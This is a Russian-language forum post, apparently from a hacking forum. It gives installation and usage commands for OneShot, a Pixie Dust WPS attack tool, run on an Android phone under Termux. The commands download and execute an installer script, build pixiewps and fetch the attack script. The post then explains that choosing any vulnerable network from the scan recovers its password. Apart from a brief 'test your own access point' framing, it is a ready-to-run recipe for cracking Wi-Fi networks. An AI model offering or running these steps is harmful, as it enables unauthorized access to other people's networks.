• Добро пожаловать на сайт - Forumteam.bet !

    Что бы просматривать темы форума необходимо зарегестрироваться или войти в свой аккаунт.

    Группа в телеграме (подпишитесь, что бы не потерять нас) - ForumTeam Chat [Подписатся]
    Связь с администратором - @ftmadmin

OneShot \ Pixie Dust attack без перевода в режим монитора.

Chollongarn

Эксперт
Эксперт
Регистрация
13.07.19
Веб-сайт
vk.com
OneShot performs Pixie Dust attack without having to switch to monitor mode.
Или же, как протестировать свою точку доступа без режима монитора.

ПРЕДИСЛОВИЕ:

Это возможно будет полезно для тех, кто не может перевести свой адаптер в режим монитора.

На GitHub можно ознакомится с установкой на другую ОС, в моем случае я буду устанавливать на телефон(Termux).



УСТАНОВКА:

Используя установщик:
pkg install -y wget
wget https://raw.githubusercontent.com/drygdryg/OneShot_Termux_installer/master/installer.sh
bash installer.sh
Вручную:
Устанавливаем библиотеки:

pkg install root-repo
pkg install wget build-essential wpa-supplicant tsu python iw

Собираем Pixiewps:

wget https://github.com/wiire-a/pixiewps/archive/master.zip && unzip master.zip
cd pixiewps*/
make && make install

Скачиваем OneShot:

wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py

(Необязательно) получение списка уязвимых для pixie dust устройств для выделения в результатах сканирования:

wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt
Запуск:
sudo python oneshot.py -i wlan0 --iface-down -K
Дальше будет виден список уязвимых сетей, все интуитивно понятно, дальше выбираешь цифру сети(они пронумерованы), и если сеть уязвима - получаем пароль.


(источник: https://github.com/drygdryg/OneShot)
 
Сверху Снизу